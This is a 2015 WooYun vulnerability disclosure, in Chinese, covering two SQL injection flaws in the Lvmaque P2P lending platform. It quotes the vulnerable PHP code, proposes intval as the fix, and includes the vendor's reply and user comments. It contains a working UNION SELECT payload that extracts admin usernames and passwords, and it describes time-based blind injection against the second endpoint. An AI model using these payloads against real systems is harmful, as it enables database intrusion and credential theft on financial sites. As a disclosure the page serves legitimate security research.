当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140181

漏洞标题:绿麻雀p2p网贷系统两处sql注入

相关厂商:lvmaque.com

漏洞作者: 牛肉包子

提交时间:2015-09-10 15:49

修复时间:2015-12-11 13:32

公开时间:2015-12-11 13:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-10: 细节已通知厂商并且等待厂商处理中
2015-09-12: 厂商已经确认,细节仅向厂商公开
2015-09-15: 细节向第三方安全合作伙伴开放
2015-11-06: 细节向核心白帽子及相关领域专家公开
2015-11-16: 细节向普通白帽子公开
2015-11-26: 细节向实习白帽子公开
2015-12-11: 细节向公众公开

简要描述:

两处注入

详细说明:

注入1
D:\WWW\App\Lib\Action\Member\DebtAction.class.php

public function  agreement()
        {
            //获取文章模版
            $article = M('article_category')->field('type_content')->where(array('type_nid'=>'zqht'))->find();
            if( !empty($article['type_content']) ) {
                $article_html = $article['type_content'];
                $invest_id = $this->_get('invest_id','trim',0);
                $ht=M('hetong')->field('hetong_img,name,dizhi,tel')->find();
                $this->assign('ht', $ht);
                $fields = "i.serialid, d.sell_uid,d.discount_gold,d.interest_rate, i.investor_capital,i.add_time,m.user_name"
                    .",b.borrow_name,b.add_time as b_add_time,b.second_verify_time, b.id, b.borrow_interest_rate, b.total, b.has_pay";
                $debt = M("debt d")
                    ->field($fields)
                    ->join(C('DB_PREFIX')."borrow_investor i ON i.parent_invest_id=d.invest_id")
                    ->join(C('DB_PREFIX')."borrow_info b ON i.borrow_id=b.id")
                    ->join(C('DB_PREFIX')."members m ON d.sell_uid=m.id")
                    ->where("i.id={$invest_id}")->find();
                if( !empty($debt) ) {
                    //转让人真实姓名
                    $transfer_authentication = M('member_info')->field('idcard,real_name')->where(array('uid'=>$debt['sell_uid']))->find();
                    $borrow_investor = M('borrow_investor')->field("investor_uid,investor_capital,transfer_duration")->where(array('id'=>$invest_id))->find();
                    //不能过session获取,后期可直接移动到后台
                    if( !empty($borrow_investor) ) {
                        //购买者真实姓名
                        $invest_authentication = M('member_info')->field('idcard,real_name')->where(array('uid'=>$borrow_investor['investor_uid']))->find();
                    }
                    $debt['transfer_price'] = $debt['investor_capital']*(1-bcdiv($debt['discount_gold'], 100, 4));
                    if( $debt['borrow_type'] > BorrowModel::BID_CONFIG_TYPE_MORTGAGE ) {
                        $debt['second_verify_time'] = $debt['b_add_time'];
                    }
                }
                $web_name = $this->glo; //平台名称
                $transfer_price = $borrow_investor['investor_capital']*(1-$debt['discount_gold']/100); //本金的转让价格,这里的转让信息不包含利息
                $debt_fee_rate = get_global_setting('debt_fee');
                $debt_fee = $transfer_price*$debt_fee_rate/100; //转让手续费
                $healthy = array(
                    "[web_name]", "[serialid]", "[add_time]", "[transfer_real_name]", "[transfer_idcard]",
                    "[invest_real_name]", "[invest_idcard]", "[company_name]", "[domain]","[hetong_img]",
                    "[transfer_capital]", "[transfer_price]", "[transfer_fee]", "[remain_days]", "[repayment_list]",
                );
                $yummy   = array(
                    $web_name['web_name'], $debt['serialid'], date('Y年m月d日', $debt['add_time']), $transfer_authentication['real_name'],  $transfer_authentication['idcard'],
                    $invest_authentication['real_name'], $invest_authentication['idcard'], $ht['name'], DOMAIN, '<img class="hetongzhang" src="/'.$ht['hetong_img'].'" border="0">',
                    $borrow_investor['investor_capital'], $transfer_price, $debt_fee, $borrow_investor['transfer_duration']
                );
                $newphrase = str_replace($healthy, $yummy, $article_html);
                $this->assign('article_html', $newphrase);
            } else {
                $this->error('系统有误,请联系网站客服!');
            }
            $debt_total = $this->Debt->getAlsoPeriods($invest_id);
            $this->assign('debt_total', $debt_total);
            $buy_user = M("members")->field("user_name")->where("id={$debt['buy_uid']}")->find();
            $this->assign('buy_user', $buy_user['user_name']);
            $this->assign('debt', $debt);
            $this->display();
        }
       
    }


其中 $invest_id = $this->_get('invest_id','trim',0);这是tp里面的一个方法,就是通过$_GET获取参数然后通过trim处理。在trim之后就进入了sql里面

$debt = M("debt d")
                    ->field($fields)
                    ->join(C('DB_PREFIX')."borrow_investor i ON i.parent_invest_id=d.invest_id")
                    ->join(C('DB_PREFIX')."borrow_info b ON i.borrow_id=b.id")
                    ->join(C('DB_PREFIX')."members m ON d.sell_uid=m.id")
                    ->where("i.id={$invest_id}")->find();


可以看到没单引号。这样就可以直接注入了。
构造

http://192.168.142.143/member/debt/agreement?invest_id=1 UNION SELECT concat(user_name,0x5c,user_pass),2,3,4,5,6,7,8,9,10,11,12,13,14 from lzh_ausers


QQ截图20150910005142.jpg


注入2
D:\WWW\App\Lib\Action\Member\0authloginAction.class.php

public function del_oauth()
        {
            $id = $this->_get("id",'strip_tags', 0);
            $result = M("oauth")->where("id=".$id." and bind_uid=".$this->uid)->delete();
            if($result){
                $this->success('成功解除绑定', U('index'));
            }else{
                $this->error('解除失败!');
            }                
        }


id通过get获取然后没有单引号就进入了sql里面。由于是detele后面的,所以只能盲注。

漏洞证明:

由于demo有安全狗所以用案例测试的

QQ截图20150910002656.jpg


QQ截图20150910003334.jpg


由于user()第一位为r 所以延时成功

QQ截图20150910004856.jpg


这里是不成功

QQ截图20150910004933.jpg

修复方案:

intval

版权声明:转载请注明来源 牛肉包子@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-09-12 13:30

厂商回复:

非常感谢您对绿麻雀安全的关注,已联系相关人员处理

最新状态:

暂无

漏洞评价:

评论

  1. 2015-09-10 16:59 | %270x5c ( 实习白帽子 | Rank:72 漏洞数:26 | 乌拉拉)

    可啪

  2. 2015-09-12 13:29 | 绿麻雀(乌云厂商)

    非常感谢您对绿麻雀安全的关注

  3. 2015-09-12 13:37 | 玉林嘎 ( 普通白帽子 | Rank:888 漏洞数:103 )

    请允许我做一个悲伤的表情

  4. 2015-09-12 14:53 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

    @绿麻雀 你rank给的太低了

  5. 2015-09-16 09:53 | Wangl ( 实习白帽子 | Rank:33 漏洞数:4 | 新浪支付,值得拥有)

    你们王总可好?

  6. 2015-09-22 13:13 | 豆战剩佛 ( 路人 | Rank:0 漏洞数:3 | 馒头炒米饭)

    你们王总可好?